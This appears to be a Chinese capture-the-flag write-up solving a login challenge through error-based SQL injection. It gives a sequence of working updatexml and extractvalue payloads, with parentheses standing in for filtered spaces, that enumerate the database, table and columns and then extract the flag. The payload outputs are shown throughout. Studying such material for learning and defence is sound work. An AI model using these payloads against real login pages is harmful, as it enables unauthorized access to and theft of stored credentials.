打开页面,还是注入
?username=admin' or '1'='1 %23&password=password
万能密码不行,并且一直是相同的返回信息,被过滤了就会显示这个
?username=admin'&password=password
报错可以报错注入
构造payload,这里还过滤了空格(括号绕过)
?username=admin'or(updatexml(1,concat(0x7e,(select(database())),0x7e),1))%23&password=1
or
?username=admin'or(extractvalue(1,concat(0x7e,(select(database())),0x7e)))%23&password=1
XPATH syntax error: '~geek~'
?username=admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=1
XPATH syntax error: '~H4rDsq1~'
?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=1
XPATH syntax error: '~id,username,password~'
?username=admin'or(updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1))%23&password=1
XPATH syntax error: '~flag{ee2d297b-ca3d-4d9e-9c8a-d2'
flag没全部输出,大笑.gif
?username=admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))%23&password=1
XPATH syntax error: '~b-ca3d-4d9e-9c8a-d23113610a22}~'